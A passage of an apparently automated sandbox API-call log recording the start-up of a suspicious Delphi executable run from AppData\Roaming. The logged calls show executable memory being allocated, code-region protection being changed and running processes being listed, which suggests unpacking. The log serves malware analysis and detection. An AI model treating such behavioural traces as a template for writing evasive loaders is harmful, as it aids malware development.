lpProcName="VariantChangeTypeEx") returned 0x75e64c28 [0099.572] GetProcAddress (hModule=0x75e60000, lpProcName="VarNeg") returned 0x75edc802 [0099.572] GetProcAddress (hModule=0x75e60000, lpProcName="VarNot") returned 0x75edec66 [0099.572] GetProcAddress (hModule=0x75e60000, lpProcName="VarAdd") returned 0x75e85934 [0099.572] GetProcAddress (hModule=0x75e60000, lpProcName="VarSub") returned 0x75edd332 [0099.572] GetProcAddress (hModule=0x75e60000, lpProcName="VarMul") returned 0x75eddbd4 [0099.572] GetProcAddress (hModule=0x75e60000, lpProcName="VarDiv") returned 0x75ede405 [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarIdiv") returned 0x75edf00a [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarMod") returned 0x75edf15e [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarAnd") returned 0x75e85a98 [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarOr") returned 0x75edecfa [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarXor") returned 0x75edee2e [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarCmp") returned 0x75e7b0dc [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarI4FromStr") returned 0x75e76fab [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarR4FromStr") returned 0x75e801a0 [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarR8FromStr") returned 0x75e7699e [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarDateFromStr") returned 0x75e86ba7 [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarCyFromStr") returned 0x75ea6c12 [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarBoolFromStr") returned 0x75e7dbd1 [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarBstrFromCy") returned 0x75e87fdc [0099.573] GetProcAddress (hModule=0x75e60000, lpProcName="VarBstrFromDate") returned 0x75e77a2a [0099.574] GetProcAddress (hModule=0x75e60000, lpProcName="VarBstrFromBool") returned 0x75e80355 [0099.574] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8 [0099.574] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xac [0099.574] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0099.574] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x770d0000 [0099.574] GetDC (hWnd=0x0) returned 0x1010ac2 [0099.574] GetDeviceCaps (hdc=0x1010ac2, index=90) returned 96 [0099.574] ReleaseDC (hWnd=0x0, hDC=0x1010ac2) returned 1 [0099.574] GetDC (hWnd=0x0) returned 0x1010ac2 [0099.574] GetDeviceCaps (hdc=0x1010ac2, index=104) returned 0 [0099.574] ReleaseDC (hWnd=0x0, hDC=0x1010ac2) returned 1 [0099.574] CreatePalette (plpal=0x18fb30) returned 0x3f080af5 [0099.574] GetStockObject (i=7) returned 0x1b00017 [0099.574] GetStockObject (i=5) returned 0x1900015 [0099.574] GetStockObject (i=13) returned 0x18a002e [0099.574] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0099.574] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0099.575] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0099.575] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0e7 [0099.576] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0f8 [0099.576] GetCurrentThreadId () returned 0xeb4 [0099.576] GlobalAddAtomA (lpString="WndProcPtr0040000000000EB4") returned 0xc147 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0099.576] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0099.577] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0099.577] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1f3 [0099.577] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1f4 [0099.578] GetVersion () returned 0x1db10106 [0099.578] GetCurrentProcessId () returned 0xeb0 [0099.578] GlobalAddAtomA (lpString="Delphi00000EB0") returned 0xc146 [0099.578] GetCurrentThreadId () returned 0xeb4 [0099.578] GlobalAddAtomA (lpString="ControlOfs0040000000000EB4") returned 0xc145 [0099.578] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000EB4") returned 0xc1cd [0099.578] GetProcAddress (hModule=0x770d0000, lpProcName="GetMonitorInfoA") returned 0x770f4413 [0099.578] GetProcAddress (hModule=0x770d0000, lpProcName="GetSystemMetrics") returned 0x770e7d2f [0099.578] GetSystemMetrics (nIndex=19) returned 1 [0099.621] GetSystemMetrics (nIndex=75) returned 1 [0099.621] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x211320, fWinIni=0x0 | out: pvParam=0x211320) returned 1 [0099.621] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0099.621] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0099.622] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x602bf [0099.622] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0099.622] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0099.622] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0099.622] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x40279 [0099.622] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x302e5 [0099.623] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x502b5 [0099.623] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x302d1 [0099.623] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x7025b [0099.623] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x302c1 [0099.623] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0099.623] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0099.623] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0099.623] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0099.623] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0099.624] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0099.624] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0099.624] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0099.624] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0099.624] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0099.624] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0099.624] GetDC (hWnd=0x0) returned 0x1010ac2 [0099.624] GetDeviceCaps (hdc=0x1010ac2, index=90) returned 96 [0099.624] ReleaseDC (hWnd=0x0, hDC=0x1010ac2) returned 1 [0099.624] GetProcAddress (hModule=0x770d0000, lpProcName="EnumDisplayMonitors") returned 0x770f451a [0099.624] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4505a4, dwData=0x21156c) returned 1 [0099.624] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fe97, fWinIni=0x0 | out: pvParam=0x18fe97) returned 1 [0099.624] CreateFontIndirectA (lplf=0x18fe97) returned 0x300a0acb [0099.625] GetObjectA (in: h=0x300a0acb, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0099.625] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fd43, fWinIni=0x0 | out: pvParam=0x18fd43) returned 1 [0099.625] CreateFontIndirectA (lplf=0x18fe1f) returned 0x580a0ae8 [0099.625] GetObjectA (in: h=0x580a0ae8, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0099.625] CreateFontIndirectA (lplf=0x18fde3) returned 0x1c0a0adc [0099.625] GetObjectA (in: h=0x1c0a0adc, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0099.625] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x302c3 [0099.628] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fdf7, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0099.628] OemToCharA (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", pDst=0x18fdf7 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe") returned 1 [0099.628] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x310000 [0099.629] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fdac | out: lpWndClass=0x18fdac) returned 0 [0099.629] RegisterClassA (lpWndClass=0x46de54) returned 0xc5c1c5 [0099.629] GetSystemMetrics (nIndex=0) returned 1440 [0099.629] GetSystemMetrics (nIndex=1) returned 900 [0099.629] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="sjfhjjskfsf", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x302f2 [0099.634] SetWindowLongA (hWnd=0x302f2, nIndex=-4, dwNewLong=3215343) returned 4219884 [0099.634] SendMessageA (hWnd=0x302f2, Msg=0x80, wParam=0x1, lParam=0x302c3) returned 0x0 [0099.635] NtdllDefWindowProc_A (hWnd=0x302f2, Msg=0x80, wParam=0x1, lParam=0x302c3) returned 0x0 [0099.651] NtdllDefWindowProc_A (hWnd=0x302f2, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x302c5 [0099.654] SetClassLongA (hWnd=0x302f2, nIndex=-14, dwNewLong=197315) returned 0x0 [0099.655] GetSystemMenu (hWnd=0x302f2, bRevert=0) returned 0x602b7 [0099.656] DeleteMenu (hMenu=0x602b7, uPosition=0xf030, uFlags=0x0) returned 1 [0099.656] DeleteMenu (hMenu=0x602b7, uPosition=0xf000, uFlags=0x0) returned 1 [0099.656] DeleteMenu (hMenu=0x602b7, uPosition=0xf010, uFlags=0x0) returned 1 [0099.657] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fd78 | out: lpList=0x18fd78) returned 1 [0099.658] GetModuleHandleA (lpModuleName="USER32") returned 0x770d0000 [0099.658] GetProcAddress (hModule=0x770d0000, lpProcName="AnimateWindow") returned 0x770fb531 [0099.658] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x751c0000 [0099.658] GetProcAddress (hModule=0x751c0000, lpProcName="InitializeFlatSB") returned 0x751f266f [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="UninitializeFlatSB") returned 0x751f2542 [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="FlatSB_GetScrollProp") returned 0x751f1d29 [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="FlatSB_SetScrollProp") returned 0x751f238d [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="FlatSB_EnableScrollBar") returned 0x751f20c9 [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="FlatSB_ShowScrollBar") returned 0x751f1fdb [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="FlatSB_GetScrollRange") returned 0x751f1e8d [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="FlatSB_GetScrollInfo") returned 0x751f1f0f [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="FlatSB_GetScrollPos") returned 0x751f1ccd [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="FlatSB_SetScrollPos") returned 0x751f216d [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="FlatSB_SetScrollInfo") returned 0x751f22be [0099.659] GetProcAddress (hModule=0x751c0000, lpProcName="FlatSB_SetScrollRange") returned 0x751f21e2 [0099.659] GetModuleHandleA (lpModuleName="User32.dll") returned 0x770d0000 [0099.660] GetProcAddress (hModule=0x770d0000, lpProcName="SetLayeredWindowAttributes") returned 0x7710ec88 [0099.660] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0bf [0099.660] LoadBitmapA (hInstance=0x0, lpBitmapName=0x7ff7) returned 0x18050ac1 [0099.660] GetObjectA (in: h=0x18050ac1, c=84, pv=0x18fed0 | out: pv=0x18fed0) returned 24 [0099.660] DeleteObject (ho=0x18050ac1) returned 1 [0099.660] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc197 [0099.660] DdeInitializeA (in: pidInst=0x211ee0, pfnCallback=0x459c74, afCmd=0x0, ulRes=0x0 | out: pidInst=0x211ee0) returned 0x0 [0099.661] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe00, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0099.661] DdeCreateStringHandleA (idInst=0x1000080, psz="sjfhjjskfsf", iCodePage=1004) returned 0xc000 [0099.661] DdeNameService (idInst=0x1000080, hsz1=0xc000, hsz2=0x0, afCmd=0x1) returned 0x1 [0099.664] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x46fc24, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0099.664] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0099.664] SelectPalette (hdc=0x0, hPal=0x0, bForceBkgd=0) returned 0x0 [0099.664] GetLastError () returned 0x6 [0099.664] GetLocalTime (in: lpSystemTime=0x46fc04 | out: lpSystemTime=0x46fc04*(wYear=0x7e4, wMonth=0x8, wDayOfWeek=0x2, wDay=0x4, wHour=0x17, wMinute=0x19, wSecond=0x21, wMilliseconds=0x8f)) [0099.664] MapVirtualKeyA (uCode=0x0, uMapType=0x0) returned 0x0 [0099.664] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x46fbfc | out: lpSystemTimeAsFileTime=0x46fbfc*(dwLowDateTime=0x8cb76e40, dwHighDateTime=0x1d66ab6)) [0099.664] FileTimeToSystemTime (in: lpFileTime=0x46fbfc, lpSystemTime=0x46fc14 | out: lpSystemTime=0x46fc14) returned 1 [0099.664] VirtualProtect (in: lpAddress=0x45c361, dwSize=0xfd9d, flNewProtect=0x40, lpflOldProtect=0x18ff24 | out: lpflOldProtect=0x18ff24*=0x20) returned 1 [0099.667] VirtualAlloc (lpAddress=0x0, dwSize=0x31c, flAllocationType=0x3000, flProtect=0x4) returned 0x370000 [0099.691] LoadLibraryA (lpLibFileName="shell32") returned 0x76260000 [0099.691] LoadLibraryA (lpLibFileName="user32") returned 0x770d0000 [0099.692] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x380000 [0099.692] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f894, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0099.692] VirtualAlloc (lpAddress=0x0, dwSize=0x7fee0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e50000 [0099.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe4 [0099.699] Process32FirstW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.700] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0099.700] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0099.701] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.701] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0099.701] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.702] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0099.702] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0099.703] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0099.703] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0099.704] 